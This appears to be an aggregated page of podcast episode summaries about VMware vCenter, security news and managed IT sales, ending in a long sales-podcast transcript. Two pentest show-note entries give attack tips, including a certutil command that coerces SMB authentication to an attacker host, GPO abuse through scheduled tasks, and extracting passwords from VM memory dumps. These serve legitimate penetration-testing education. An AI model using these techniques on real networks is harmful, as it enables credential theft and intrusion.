Centralized management utility for VMware
You've found The Backup Wrap-up, your go-to podcast for all things backup, recovery, and cyber-recovery. In this episode, we tackle one of the scariest threats out there - ransomware targeting VMware ESXi environments. I'm joined by Prasanna Malaiyandi and our special guest Melissa Palmer, also known as @vmiss, who's an independent technology analyst and ransomware resiliency architect. We get into why virtualization environments are such juicy targets for attackers, how they're specifically going after vCenter and ESXi hosts, and why your backup strategy is probably missing some critical components. If you've got a virtualized environment, you need to listen to this. Melissa brings her unique perspective from both the virtualization and security worlds to help you protect your most critical infrastructure. So buckle up - this is an episode you can't afford to miss if you want to keep your VMware environment safe from ransomware attacks.
In episode 091 of the Unexplored Territory Podcast we have Ravi Soundararajan as a guest to discuss all things performance. There's a reason Ravi's name on X is "vCenterPerfGuy". Ravi has been involved in performance troubleshooting and engineering for the longest time, and shares his insights in some of the most recent findings with regards to vSphere Tagging and the API performance. Ravi also discusses vCenter bandwidth requirements and some of the vCenter task limits there are in place. Make sure to listen to this episode from start to finish!
Some papers discussed:
https://www.vmware.com/docs/vcenter80u3-tagging-perf
https://www.vmware.com/docs/robo-vcenter67-perf
https://www.vmware.com/docs/vc6-perf-bp
Disclaimer: The thoughts and opinions shared in this podcast are our own/guest(s), and not necessarily those of Broadcom or VMware by Broadcom.
Take a Network Break! We start with a brief follow-up on our CVE coverage, and then dive into a serious one-two set of vulnerabilities being exploited in Palo Alto Networks software, VMware taking a second crack at patching a vCenter vulnerability, and notable CVEs in D-Link and HPC gear. An AI company loses a quarter...
On this episode of the Virtually Speaking Podcast, we're joined by Dilpreet Bindra, Senior Director of Engineering at Broadcom. As a leader of the VCF Workload Organization, Dilpreet drives the delivery of runtime platforms and automation essential for workloads and clouds. In this episode, Dilpreet discusses his extensive experience with key VMware technologies like ESXi, the kernel, vMotion, Storage vMotion, vCenter, and more. He also explains how VMware by Broadcom enhances the cloud-like experience, enabling customers to deliver greater value for their businesses. Additionally, Dilpreet shares insights into how Private AI empowers VMware by Broadcom to offer a new class of workloads, maintaining the simplicity and resource management principles that VMware was built upon. Links Mentioned Private AI and Advanced Services on VCF: What's Next? Playlist: VMware Explore Las Vegas 2024 The Virtually Speaking Podcast The Virtually Speaking Podcast is a technical podcast dedicated to discussing VMware topics related to private and hybrid cloud. Each week Pete Flecha and John Nicholson bring in various subject matter experts from within the industry to discuss their respective areas of expertise. If you're new to the Virtually Speaking Podcast check out all episodes on vspeakingpodcast.com and follow on TwitterX @VirtSpeaking
In this conversation, Katarina Brookfield discusses her career trajectory and her current role at Broadcom. She shares defining moments in her career, including her experience working on the Black Sea Maritime Archaeology project. The conversation then shifts to the newly announced vSphere IaaS control plane and its benefits. Katarina explains that the control plane provides a comprehensive solution for deploying workloads, including additional services like storage provisioning and load balancing. The conversation also covers the self-service nature of the control plane, the different interfaces for consumers and admins, and the integration of HashiCorp Packer for building and customizing VM images. The TKG service, which allows for the deployment of managed Kubernetes clusters, is also discussed, highlighting its ease of use and integration with vSphere. The conversation concludes with a discussion of the new features in the latest version of the TKG service, including cluster auto-scaling and the decoupling of TKG from vCenter.
Takeaways
The vSphere IaaS control plane provides a comprehensive solution for deploying workloads, including additional services like storage provisioning and load balancing.
The control plane offers a self-service experience for consumers, allowing them to easily deploy the services they need.
Different interfaces, including APIs, CLI, and UI, cater to the preferences of different users, making it accessible to both admins and consumers.
The integration of HashiCorp Packer allows for the building and customization of VM images, providing flexibility and automation.
The TKG service simplifies the deployment of managed Kubernetes clusters, making it accessible to users with little Kubernetes experience.
The latest version of the TKG service decouples it from vCenter, allowing for faster delivery of new Kubernetes versions.
New features in the TKG service include cluster auto-scaling and the integration of HashiCorp Packer for building and customizing VM images.
Chapters
00:00 - Kat's Career Trajectory and the Role of Defining Moments
09:20 - The Comprehensive Solution of the vSphere IaaS Control Plane
11:02 - Enabling Self-Service and Catering to Different User Preferences
18:14 - Flexibility and Automation with HashiCorp Packer Integration
22:47 - Simplifying Kubernetes Deployment with the TKG Service
29:14 - Decoupling TKG from vCenter for Faster Delivery of Kubernetes Versions
38:36 - New Features in the Latest Version of the TKG Service
Disclaimer: The thoughts and opinions shared in this podcast are our own/guest(s), and not necessarily those of Broadcom or VMware by Broadcom.
Hi, today's tale of pentest pwnage covers a few wins and one loss:
A cool opportunity to drop Farmer “crops” to a domain admin's desktop folder via PowerShell remote session
Finding super sensitive data by dumpster-diving into a stale C:\Users\Domain-Admin profile
Finding a vCenter database backup and being unable to pwn it using vcenter_saml_login
Continuing our special 10-part series "Exploring VMware Cloud Foundation." Virtually Speaking hosts Pete Flecha and John Nicholson interview various subject matter experts to break down the components that make up VMware Cloud Foundation (VCF) and provide insights into its powerful capabilities for private cloud environments. In Episode 6, 'VCF Networking' we delve into the intricate world of networking within VMware Cloud Foundation, with a focus on the powerful capabilities of NSX. Joining us are Heath Johnson and Kyle Gleed from VCF Technical Marketing, who guide us through the integration of NSX within VCF and its transformative impact on networking architecture. Our discussion encompasses various facets of networking within VCF, all revolving around the versatile functionalities of NSX. From discussing the essential role of software-defined networking (SDN) for private cloud environments to exploring real-world use cases such as mobility, disaster recovery, and automated networking for Infrastructure-as-a-Service (IaaS) deployments, Heath and Kyle provide valuable insights into NSX's applicability in diverse scenarios. A highlight of the conversation is the introduction of the VPC Simplified UI, seamlessly integrated within vCenter to streamline networking operations within VCF. Heath and Kyle walk us through the simplicity of deployment, catering to both greenfield and brownfield environments, while also offering strategic guidance on migration strategies to maximize efficiency. Furthermore, the discussion delves into the revolutionary concept of Data Processing Units (DPUs) and their integration with NSX within VCF. By harnessing DPUs, VCF unlocks unprecedented network offloading capabilities, optimizing performance and scalability for modern cloud infrastructures. 
Join us in Episode 6 as we unravel the complexities of VCF Networking with NSX, exploring how VMware Cloud Foundation redefines networking paradigms through seamless integration and cutting-edge technologies.
Today's tale of pentest pwnage includes some fun stuff, including:
SharpGPOAbuse helps abuse vulnerable GPOs! Try submitting a harmless POC first via a scheduled task – like ping -n 1 your.kali.ip.address. When you're ready to fire off a task that coerces SMB auth, try certutil -syncwithWU \\your.kali.ip.address\arbitrary-folder.
I'm not 100% sure on this, but I think scheduled tasks capture Kerberos tickets temporarily to workstation(s). If you're on a compromised machine, try Get-ScheduledTask -taskname "name" | select * to get information about what context the attack is running under.
DonPAPI got an upgrade recently with a focus on evasion!
When attacking vCenter (see our past YouTube stream for a walkthrough), make sure you've got the vmss2core utility, which I couldn't find anywhere except the Internet Archive. Then I really like to follow this article to pull passwords from VM memory dumps.
Can't RDP into a victim system that you're PSRemote'd into? Maybe RDP is listening on an alternate port! Try Get-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" | select-object portnumber
And if you want to hang around until the very end, you can hear me brag about my oldest son who just became an EMT!
Join Eric and Corey where they discuss how to enable Okta for vCenter with Arkadiusz Krowczynski. His blog on the topic can be found at https://iamse.blog/2023/04/25/enable-okta-for-vmware-vcenter-server/
In this episode I cover details on some of the first Co-Pilot+ PCs that shipped this week, I get into 3 vulnerabilities in vCenter that were disclosed this week, a new AVD feature and much more! Reference Links: https://www.rorymon.com/blog/3-major-vcenter-vulnerabilities-worrying-sql-security-news-co-pilot-pcs-shipping-now/
Europol and partners shut down 13 terrorist websites. A data breach at the LA County Department of Public Health affects over two hundred thousand. The Take It Down act targets deepfake porn. The Five Eyes alliance update their strategies to protect critical infrastructure. VMware has disclosed two critical-rated vulnerabilities in vCenter Server. The alleged heads of the "Empire Market" dark web marketplace are charged in Chicago federal court. A new malware campaign tricks users into running malicious PowerShell “fixes.” Researchers thwart Memory Tagging Extensions in Arm chips. A major e-learning platform discloses a breach. On our Industry Voices segment, we are joined by Guy Guzner, CEO and Co-Founder of Savvy to discuss "Reimagining app and identity security for SaaS." Clearview AI offers plaintiffs a piece of the pie.
Selected Reading
Europol Taken Down 13 Websites Linked to Terrorist Operations (GB Hackers)
Los Angeles Public Health Department Discloses Large Data Breach (Infosecurity Magazine)
New AI deepfake porn bill would require big tech to police and remove images (CNBC)
Five Eyes' Critical 5 nations focus on adapting to evolving cyber threats to boost critical infrastructure security, resilience (Industrial Cyber)
VMware by Broadcom warns of critical vCenter flaws (The Register)
Empire Market owners charged for enabling $430M in dark web transactions (Bleeping Computer)
From Clipboard to Compromise: A PowerShell Self-Pwn (Proofpoint US)
Arm Memory Tag Extensions broken by speculative execution (The Register)
Star ed-tech company discloses data breach (Cybernews)
Clearview AI Is So Broke It's Now Offering Lawsuits Plaintiffs A Cut Of Its Extremely Dubious Future Fortunes (Techdirt)
The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © N2K Networks, Inc.
A little behind schedule, we're back with jam-packed show notes. Today we walk through a really deep vale of tears: security vulnerabilities in vCenter, bugs in WatchGuard Application Control, security vulnerabilities in CheckPoint Security Gateways, security vulnerabilities in Microsoft Recall, security vulnerabilities in Azure SQL Managed Instances and... printers. We had fun anyway - hopefully you did too. ;)
Hey friends, today we continue our series all about migrating from VMWare to the world of Proxmox! Specifically: Getting my first Proxmox-based NUCs out in the field for live engagements! Pulling the trigger on two bare-metal Proxmox servers to eventually replace my vCenter environment. OVHCloud made it super easy to add Proxmox to those bare-metals with a simple wizard. I couldn't figure out how to get a Proxmox VM as the main firewall for the whole Proxmox node, but it turns out it helps to RTFM. When getting a bare-metal OS/hypervisor installed, be careful in that the provider may leave the management ports of that host open to the whole world. In OVH's case, they have a software firewall that can be tuned so that, for example, only you can hit the management ports for the box. Getting VLANs set up is a snap once the virtual hardware stuff is in place.
Sadly, the Broadcom acquisition of VMWare has hit 7MinSec hard – we love running ESXi on our NUCs, but ESXi free is no longer available. To add insult to injury, our vCenter lab at OVHcloud HQ got a huge price gouge (due to license cost increase; not OVH's fault). Now we're exploring Proxmox as an alternative hypervisor, so we're using today's episode to kick off a series about the joys and pains of this migration process.
In the latest episode of GreyNoise Labs Storm⚡️Watch, we delve into a variety of cybersecurity topics that are crucial for professionals to stay abreast of. We kick off with a discussion on the World Economic Forum's Cybersecurity Outlook for 2024, providing insights into the anticipated challenges and strategies for the coming year. This is followed by an analysis of the Allianz Global Risk Barometer Redux 2024, which highlights the evolving landscape of cyber threats and their implications for global risk management. The episode also introduces LogBoost, a tool designed to enhance log analysis, which is essential for identifying and mitigating security incidents. We then shift our focus to a recent vulnerability in VMware's vCenter, as reported by Censys, and discuss its potential impact on virtual infrastructure security. GreyNoise's own research is featured prominently, with a deep dive into the F5 Big IP Remote Code Execution (RCE) vulnerabilities. We also revisit the last GreyNoise Tag Webinar, which offers a comprehensive understanding of GreyNoise tags and their application in cybersecurity. Additionally, we review the 2023 GreyNoise Retrospective Internet Exploitation Report, which provides a retrospective look at the past year's internet exploitation trends. To keep our listeners informed on the latest cyber threats, we cover the most recent tags and active campaigns as observed by GreyNoise, offering a real-time perspective on the threat landscape. Lastly, we round up the episode with a discussion on the Known Exploited Vulnerabilities (KEV) catalog from CISA, which is an essential resource for cybersecurity professionals to prioritize their defensive efforts.
Listen to the powerhouse team of Brandon Ivey and Christoph Uhlig from Evok Technologies. They live and breathe cloud & security sales. Being uniquely positioned to understand what a customer is going through, they talk modernization, augmenting teams, and the struggles they help customers overcome. Can you believe that we're already at 100 episodes? While we go and ramp up and get ready for season three, we're gonna take you back, listen to some of the great moments in these past episodes. So stay tuned as we take you back to season one and two. – Hey everybody, welcome back. I'm your host, Josh Lupresto and this is the Next Level BizTech Podcast. So today we are actually wrapping up the first series in season two, and we're talking about managed services and how we're solving this tech talent issue that we've got going on with security and the broader technology landscape. So if you tuned in on the first episode, you heard Jason Stein, and he talked about what Telarus is doing overall from the practice and how we go to market and what we're seeing and the trends and things like that. And then we had one of our great suppliers on where Thrive came on and talked about all the things from a technical perspective, their products, where they're fitting, how they go to market with those, differentiators, all that good stuff. But today we get to hear from what I think is really critical. We get to hear from the partner's perspective. So we got some good friends of mine. We've been spending a lot of time together lately. We got Brandon Ivey and Christoph Uhlig from EVOK Technologies. Gents, Brandon, welcome. – Thanks for having us, Josh. It's really great to be here. – All right, so let's kick this off. Brandon, I'm gonna come to you first here. Part of my favorite story is how do you get started? Everybody has a different path. Some people super linear, some people do crazy windy stuff and end up in this world. I'm curious to hear how you guys get started in this. 
– Absolutely, so it's kind of interesting. I think Christoph and I both have similar backgrounds and kind of went through similar trials and tribulations, if you will, through our career path. We both started out in entry-level sales jobs coming out of college, worked up the corporate ladder, led sales teams, became directors or VPs and led overall go-to-market strategies and new logo acquisition sales. And interesting enough, neither one of us really wanted to be in management roles any longer. And we found ourselves starting at a cloud company on the same day in the same role. And what was interesting enough, at least from my perspective, is that we kind of hit it off from the get-go. I think Christoph may have had a difference of opinion, but he was like, “Hey, I want to be in line with that guy, he seems competitive.” And we fed off of that. And so what we did to begin with was we started interviewing all of the top reps at the organization, trying to figure out what was the secret sauce to be successful, right? In long story short, most of them didn't have a lot of positive feedback. It was, if you got lucky enough to be tagged to that right account that was growing, et cetera, et cetera, then you had some success. So we kind of stumbled and went through some different challenges the first few months at that cloud company. And then we realized we needed a force multiplier. And I had some little exposure to what the channel ecosystem was, more from a competitive standpoint, based on where I was when I was leading a sales team, there was a channel. And so we introduced that, we started working with some regional players, and we started integrating that into our go-to-market strategy. And effectively after six months at the cloud company, we took it to the executive team and the board and said, “Hey, I think this is what we need to do.” We partnered, Christoph and I effectively partnered. We created our own business model within a business, if you will. 
And I think that's what's kind of allowed us to have the success that we're having coming up or at least kicking off this new venture two and a half years ago. – Love it. Christoph, any interesting door-to-door experience? I mean, I'm a vacuum guy. I don't know if you guys have, you know, I always… – I think you know me too. I think we talked earlier and you teed that one right up. But no, like, just like Brandon, I think, you know, we were willing to do what we needed to, to learn the art of hard work and creativity. Yeah, we've both had plenty of door-to-door opportunities. To really grind, we've had some really unique creative opportunities in our career that took some critical thinking. But, you know, all of that led up to the fact that I think sales and just working with people was like really important to us. We wanted to help people solve problems. And, you know, I know we're gonna talk a little bit about our business in a bit, but I think being so integrated into sales gave us a unique perspective to help us be more effective for our customers today from a procurement and buying standpoint. I often say, I think the best defense lawyers once were prosecutors and vice versa, understanding, you know, the intricacies of the other side, you know, really, really well, allows us to, I think, serve our customers a lot more effectively. But yeah, I mean, to Brandon's point, when we got to this cloud provider, us realizing the power of the channel, and really what that force multiplier could do was, you know, a game changer. It was like an aha moment for me, for sure, because I had had zero exposure to the channel. And when we looked and we interviewed these, you know, previous sales reps for best practices and what's replicable and what can we do to be successful here, the reality was they weren't closing new logos. They weren't getting in front of new companies. And, you know, the channel gave Brandon and I that opportunity. 
– That company is a channel first company now, by the way. So clearly this strategy works. – I may be biased, but I think this is where the industry is going. It is funny though. I mean, it is funny as long as we've been doing this and as long as Telarus has been in existence, it's still fascinating to me how many people are just not familiar with the channel yet. And obviously we're all seeing the convergence of doing away with some of the direct sales and moving more headcount over to channel and supporting channel. But, you know, just when we think it's been in existence for a while, it's still, if you zoom out, it's still so early in some instances. – I think a lot of that's too with the, there's been a lot of focus on specific technologies over time. So just the simple fact that we're discussing, you know, MSP or MSSPs today, you know, that's kind of broadening out that scope, right? So, you know, I think it's only gonna get bigger and bigger like you mentioned. – All right, so we were talking about your business now. Tell everybody, fill us in, you guys have a cool go-to-market model and I love some of the focuses that you have on the technology side, but let everybody know what is EVOK? – Sure, well, first of all, EVOK stands for Enable, Validate, Optimize, Knowledge Transfer. And just like Chris just mentioned, essentially we wanted to take what we thought were how would a customer want to procure things? How would they want to run a process? How would they want to evaluate the market? How would they essentially want to ensure that they have a consistent buying experience that's productive and mitigates bad customer experiences coming out the backend? So we took those kind of four terms, if you will, layered that into what we thought would be the right customer engagement. We kind of trialed that, if you will, with a few anchor tenants, found out it was productive. And then we've replicated that now over the past three years. 
But, you know, who we are essentially, like Christoph mentioned, we did a lot of time in sales. And the last thing we want to do is be a sales rep to our individual clients. We have really formed relationships with them now to be an extension of the team, to provide all that intellectual property to them that allows them to realize, oh, hey, there is a better way of doing this. Or potentially they're just getting exposure to a provider that they would have never even looked at because it's not in Gartner, or that doesn't come up on an SEO search, or whatever it might be. And I think that started to change that dynamic of like, oh, this is interesting, or this is advantage, or potentially this is just providing more value than what we were doing or how we were doing it in the past. So yeah, but we founded it three years ago. It's been going strong with groups like Telarus supporting us and enabling us. We've seen a lot of success and our clients have, you know, they're like, when can we be a reference? How can we help scale your business? What does this look like? And that's very rewarding. And it's something that, you know, most salespeople probably don't get to experience in that similar role, right? So yeah, it's been great. – Good point. So let's switch gears here. I wanna talk about, you know, first, Christoph, how you learned about this technology, and then really maybe just let's weave that into the first deal. We're gonna get to a more recent deal as we move this on and kind of into the weeds and the intricacies of it. But talk to me about, you know, was it when you're at that cloud company, was it before that? I mean, what's your first exposure to this whole managed services landscape and talking about just that first deal? What was that like? – So I would say, you know, our experience working at hosting gave us immense insight into managed services in general and just understanding the criticality of what that offering ultimately does. 
You know, both from a provider perspective, but also more importantly from a customer's perspective. But, you know, back in, I don't know, call it 2012, 2011, 2012, you started seeing a massive shift from on-prem to the cloud, right? Like people realizing, hey, AWS is something. Azure is something. Private cloud and getting this out of our facility and into a data center that's redundant and supported. I mean, it's something we need to move towards, but not a lot of people knew how to do it. And, you know, we started meeting with just tons of customers that wanted help with that journey. They wanted ideas, they wanted a roadmap. They wanted to figure out how do we take this on-prem, you know, and move this into the cloud? And how can we, you know, get some of these mundane tasks of call it monitoring and patch management and antivirus and performing backups and the day-to-day care and feeding of the environment? How do we get this off our plate and free us up to focus on the core competencies of our business and, you know, what's really driving our company forward? And then secondly, how do we solve things like database management and database architecture and security services and some of the stuff that, frankly, they couldn't even find people, you know, to fill those roles. And so you have a system administrator that's potentially getting paid 100K a year, patching servers, you know, 75% of his time. And then the other 25% of his time moonlighting as like a security analyst or, you know, a database administrator, it just wasn't scalable. So I think when companies started realizing, hey, we need to get this stuff off-prem and we need to more importantly find a partner to co-manage this so we can create a RACI matrix that's clearly defined, hey, we want to continue to do these things at the application layer, but from the OS down, let's pass this off to a partner that we can depend on that can build a highly redundant, highly manageable, scalable infrastructure. 
And I think that's really when, you know, we first got exposure and it was just coming by the waves and it hasn't stopped today. By the way, companies are still, you know, we'll get into it, I'm sure a little bit later, but they're still looking for this more than ever. And then when I shift into kind of thinking about, you know, call it first deal, I won't probably get into the first deal, but I'll tell you about a deal that I think is super applicable to this conversation. So we're working, and this is, you know, as EVOK, this was post our days at hosting and we're working with a large university here in Colorado that, you know, unfortunately they were ransomwared about four years ago. They ended up paying the ransom, you know, it was a really tough situation for them. And, you know, they looked at the problem and said, gosh, you know, we need to figure out a solution to help us, help make us more secure. And what they did, you know, for better or for worse, they started throwing technology at the problem. You know, they started looking at EDR solutions and ultimately they selected Carbon Black. They looked at, you know, different high profile security partners like Palo Alto, and they put, you know, architected their entire environment for Palo Alto. They incorporated, you know, email filtering. What they didn't really count on was the noise that all of those tools are gonna create. And those tools are great, they're great tools, but you can't solve issues necessarily just with tools. What you need is services, right? They had 2,500 endpoints. They had over 600 lab workstations across the university. They had over 200 VMs within their environment. And like I said, they were just getting noise, but really I think what they figured out after just, you know, years of trying to solve this with, you know, patching tools and technology into the problem, they realized we need a SIEM, we need a security operations center that's staffed 24/7 that has multiple shifts. 
It's constantly looking at our logs, constantly looking at our alerts. And we need, you know, a true MDR solution. We need, and the R of that, you know, managed detection and response being the most critical aspect. We need a partner that can actually react on our behalf, can quarantine the environment, can be an extension of our team. By the way, I didn't mention it, but this university had one security officer. That's it. Yeah, nobody. So he's getting alert overload, alert fatigue. He hadn't looked at the alerts in, you know, over a year, just because it was just piling into his email. So for us to go out and really, you know, find a partner, help run a competitive process that, you know, not only did he get insight into what's available in the market, but, you know, by our process, I think he was able to make the right decision for his organization to really bring in a group that could act as an extension of his team and help deliver, you know, on his behalf. And I'll tell you, the other thing that I want to comment on is, you know, there's providers that exist out in the market today that have great technology. And they may struggle on services. They may be having service-related issues. And that technology is only as good as the services behind it. It doesn't matter if it's the best in the world, upper right corner of magic from a technology standpoint, unless the service and methodology and approach is sound, it really means nothing. – Yeah, you brought up a couple of good points in there. I want to go back to, I'm curious, you know, we always talk about, and I try to determine, are we in the middle of paradigm shifts? Did the paradigm shift already happen, right? In hindsight, we all, you know, we can see a little clearer when some of these things happen, you know, when the bull market started, when the bear market started, all of that. But if you think back to the hosting days and kind of that, let's call it a way, nine, 10, 11 timeframe. 
So you've got this, you know, AWS launching major product, right? Oh, six, oh, seven, kind of in that era, you've got the economic collapse of when people went, wait a minute, I used to buy all this stuff. I used to CapEx outlay it. Now I'm a little leery on that, you know, and, you know, there's the whole, when AWS comes out, now this is just for dev. It's never going to make it to prod. I mean, this is not the same uptime I can get in a data center. And don't get me wrong, there's places for gear in data center, I'm not disputing that. But I'm just kind of curious, is that, is that about that time where you really felt that wave of when things shifted and people started really taking this seriously and said, yeah, we got to look at this, we got to look at it. And it's just that inevitable wave that hasn't stopped. Did it start around that time as well for you? – I would say so, to a large extent, you know, back in those days, it's kind of like what security is today. People use these blanket terms security. And it's like, well, what does that actually mean? Like, let's unpack that. That's what, there's a ton of ways you can go about, you know, talking around security. And the same thing held true for cloud. I think back then they broadly said cloud. Of course, there's the concept of private cloud. There's on-prem, there's public cloud, meaning multi-tenant within a provider. And then there's true public cloud with the likes of Azure, AWS and Google. But I think a lot of people back then felt this unbelievable pressure to go to the hyperscalers, right? To go look at AWS, to go into Azure, because that was the flashy lights. Those were the things that were in the news. That was what the trades were saying that the next big wave is. And it's not wrong for certain applications. If you're, that's why startups are, were perfect for AWS and Azure and that, because they actually architected their applications in the hyperscaler cloud. 
And largely to a certain extent for the scalability of those. But, you know, what we saw was a mad rush to AWS and Azure and then a pullback, you know, back into, you know, private cloud and realizing like, look DevOps may not be for everybody. It may, you know, there's applications that are fairly predictable and have static workloads that still need, you know, a certain amount of, you know, managed services and support. But, you know, not everything needs, you know, there's not one size fits all for all of those environments. But I would say, you know, it was about that time, to your point that, you know, we really started having those conversations and seeing that shift.
– Yeah. Good point.
– I was going to say, yeah. I mean, I think economic pressure always plays a role in a lot of technology transformations across enterprises. I mean, even now we see large enterprises looking to go to more back to the old school approach of bare metal services, right? Like there's a lot of different use cases for that. I mean, I don't know if that'll be widely adopted, but there's supply chain issues and economic pressures. So, you know, those two things are driving a behavior, just like in cybersecurity, we have insurance policies and rates going up. It's driving a behavior. It's having specific impact. Back then it was co-location, CapEx expenses, transitioning to an OpEx, focusing on EBITDA, you know, all of those different things play into what enterprises make as decisions, right? And so I think as long as we're staying on top of those market trends and understanding what's taking place, not only in the technology spectrum, but holistically, you know, that helps ensure that customers make better decisions.
– Yeah. Good point. So I want to talk about relationships. You know, as you look at this, right? All of our partners have started out in different places, in different skill sets, in different technologies. Some started in cloud and then went to network. 
Some started in network and then went into, you know, all the other things. So I'm always kind of curious. I mean, you guys kind of brought it up a little bit earlier, but maybe, Christoph, I'm kind of curious about, you know, when you start having these strategic conversations, when the wall is down, right? When the customer really feels like you're an extension of their team, what does that do for the relationship with the customer when you're covering all these things?
– So I think it's critical. And, you know, Brandon and I have been very passionate about this topic for a long time. You know, we truly believe that if you go solve the mission critical objectives for an organization, or you help solve, you know, a bridge towards securing applications, keeping applications available, helping with, you know, the great resignation is a real thing. People are leaving companies. People are having a hard time finding people. People are having a hard time keeping people. You go solve mission critical objectives for organizations, you get everything, right? Like the floodgates open, you gain their trust, you gain almost everything that you could possibly want out of that relationship. So, you know, we typically are passionate about wanting to focus on the cloud and security piece of the business as a primary objective. It's always something that, you know, we get into with customers is tell me about your team, tell me about your skillsets, tell me about, you know, what you guys are trying to accomplish, tell me about the gaps that you may have across your organization. And as we start to understand like, where is there pain coming from? Where are they looking to improve organizationally? And we can start helping to identify areas and unbelievable providers that can come in as an extension. It truly does help secure and build that relationship, but it's not a one deal close type of situation. 
But the reality for a lot of these companies is, you know, the days of going to like an IBM and expecting to get everything under one roof is dead. Like instead, you know, there's laser focused, really good providers that exist out in the market today that are really good at one or two things. And it's important for Brandon and I to know who those guys are. And being able to partner with a company like Telarus and you know, your great engineering team, it's just been hugely advantageous to us because we can get insight into, okay, what are these other hundred customers across the US experiencing from these providers? Have they been happy ending? Have they been happy stories? Have they been, you know, hey, they said all the right things at the beginning throughout the sales process, but then, you know, it was a disaster. You know, once we got into the door, that's hugely important for Brandon and I to know what we're getting our customers into. It's just like when I go, it's not a perfect analogy, but when I go car shopping, you know, every three, four years, it's unbelievable the technology that has changed, you know, and is available. I don't know. So I have to really just rely on the sales guy who's telling me that, and that's not necessarily fair. So to have a guy that's all they're doing is analyzing the industry and the market and ranking and scoring providers, it's super important for us to give that same insight to a CIO who also doesn't have the time over more than three or four or five years of analyzing. What's new? What's different? What should I be aware of? So yeah, relationships are huge, but most importantly, it's, you know, solving those mission critical issues, I think gains that trust immensely.
– Good point. Brandon, I want to come back to you. I want to talk about challenges. You know, I think we're painting a really good picture here of there's a lot of value that we add, right? 
When we come in, when you guys come in, and you know, you're helping the CIO build something, build something, build something, and then this CIO might bounce and the company loses him, you know, you got great value in that from, you've helped him, you've helped establish yourself at the last company. Now he's leaning on you going, what's the new latest? What's the greatest tech that I should know? So certainly like these things take time to grow and to grow some of these relationships. I'm curious with what you've been through from a challenges perspective, what are the difficult parts of these conversations? – So we've gone through that. I'm sure, you know, most people have where the CIO or the executive IT person leaves, or you just end up having to get, go work with another individual. So potentially put in all that effort. You know, one thing that we've realized is you learn the most about an organization by running a process. And so that's probably the most challenging thing, especially if someone new steps in. So I'll take that as a secondary part of kind of like, what are the challenges that we see, right? So I think the biggest challenge, especially if you're focusing on mission critical workloads or whatever is probably the most pertinent or complex to the business, is actually establishing what do they have in place today? Usually it's a barrage of things over the last decade that maybe somebody's still just paying a bill, et cetera. So you have to establish that baseline, understand the expectations and needs of what's going forward and then being able to provide some thought leadership around all of that. You know, that's a very challenging process, right? And especially depending on if you have a non-technical executive, that can make it more challenging. 
If you have somebody who inherited just a number of different things, now you're picking through, you know, it's like, you know, you're just having to dive so deep into something that potentially they don't have access to, they don't have information from, and then it leans into the providers, right? So now where we have to take it a step farther and a lot of times those groups don't have, you know, run books set up, they don't have any kind of scripts put into place, they don't have any kind of, you know, diagrams or Visios or architecture references or security references, anything, right? It's just, essentially they were sold a product at some point, it's been potentially implemented, they're paying a bill and now it's, you know, it can be our job to figure out, well, we need to make sure that we check that box because you're either using it, not using it, or how is it applicable to the business, right? And that's where when you start trying to wrap that back into thought leadership and providing, okay, well, we need to go down that path of leaning on the different engineers across Telarus or the providers or whatever it may look like to come up with a holistic solution that actually solves everything that they have if they need it, in addition to what's needed or expected, and then providing like, well, maybe we can consolidate or rebind or evolve all of those things into the next level of, you know, where market trends are going or what's taking place in an overall environment. And that's by far the biggest challenge. And I mean, you know, I think everybody probably experiences that and, you know, that kind of leans back into the relationship piece that we just discussed where if you run that process with someone and you come out the backend where they're like, thank you, then you know you did your job, right? And you're probably gonna get another opportunity. 
And that's our whole objective is we wanna do our very best because then they're gonna give us that next opportunity. If we do that, we get the next project. We get the next opportunity. If they move to another business, we get a follow them there. And so that's been very rewarding from that perspective. – You know, it's funny. We talked in the beginning about this whole channel thing where we feel like we've been doing it a while, but you know, you bring up a good point that reminds me that I think the last people to really hear about and understand this channel are the customers. Well, they don't care, right? Why would they? But once they understand it, it's, wow, I didn't know this existed and this is amazing. Please help me. So it's been really cool to your point to see a lot of these go from, hey, I don't know who you are. I think I'm pretty cool working some of these, you know, these technologies myself. I don't really understand quite where you can help me. You know, are you a middleman? And when they take that to, you know, to your point, let us run a process. Let us help you with some of these mission critical workloads and applications, thinking through things that they hadn't thought through. There are sometimes those aha moments of you take it from, I didn't need you to, I can't live without you. Please look at this next project that we have coming in six months, 12 months. But, you know, I've seen three, four years out, some of these crazy things and that, that to your point, that's the aha moment. I think when you know that you're looped into that process, that's the click factor, but sometimes it takes time. And, you know, in these enterprise deals too, I think we talked about getting flat footed when some of these CIOs or whatever leave, it just underscores, geez, now I got to know procurement. Now I got to know tech. Now I got to know business leader. You just constantly trying to make sure that you know, all the right people in the account. 
And out of your point, it just takes time.
– You summed up exactly what we just discussed, right? I mean, I think we have a very large client here in Denver. So I think eight or 9,000 employees and it was that exact same process, right? It was, you know, I don't really understand it or what it, you know, what value is this really going to bring in? Essentially, we just let us run our process. And if you see value at the end of it, fantastic. And if you don't, you know, we'll part ways. And-
– I love the takeaway approach. That's like, it's one of my favorites. Cause it's just here, here it is. Look, we're so confident that this is going to work. It doesn't all go-
– We've had other organizations, they realize how much time, effort, data, things that we bring to the table that they paid us for these engagements, right? So there is real value. There is, you know, a real model here. And I do think that the more that you run strategic processes and not just a, you know, a transactional, like Christoph said, it's not just, you're not just going and selling something and then moving on to the next new logo, right? We're, we truly are getting entrenched into that organization and becoming an extension of their team. So-
– So let's talk, Brandon, let's talk an example here. What I like to get into this part of it really is, let's talk about, you know, what kind of environment you walked into. And what I really liked to hear is, was it really what you were told it would be or what you thought it would be? When you really got into it, what did you find? What was the problem? What was the technology? And then ultimately what was the problem that you solved? How did you do it? What kind of tech did you put in? And you know, what was the outcome of all that?
– Sure. Well, we can talk about, let's see, here's a good example. We talk about relationships, things of that nature. I had a really good friend who I went to CrossFit with. 
